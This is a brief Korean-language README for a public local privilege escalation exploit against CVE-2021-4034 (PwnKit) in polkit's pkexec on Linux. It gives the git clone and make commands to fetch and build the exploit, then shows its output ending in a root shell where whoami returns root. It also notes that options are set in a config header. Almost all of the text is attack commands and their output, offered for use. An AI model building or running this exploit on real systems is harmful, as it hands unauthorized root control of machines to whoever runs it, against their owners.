
CVE-2021-4034(PwnKit)에 대한 로컬 권한 상승 익스플로잇으로, polkit의 pkexec를 대상으로 하여 취약한 Linux 시스템에서 루트 셸 접근 권한을 제공합니다.
$ git clone https://github.com/whokilleddb/CVE-2021-4034
$ cd CVE-2021-4034
$ make
[!] CVE-2021-4034 Exploit By whokilleddb
[!] Initializing Setup
[+] Setup Done :D
[!] Setting Root Privileges
[!] Launching Root Shell
# /bin/whoami
root
# chmod 0755 `which pkexec`
참고: include/config.h를 수정하여 옵션을 구성할 수 있습니다.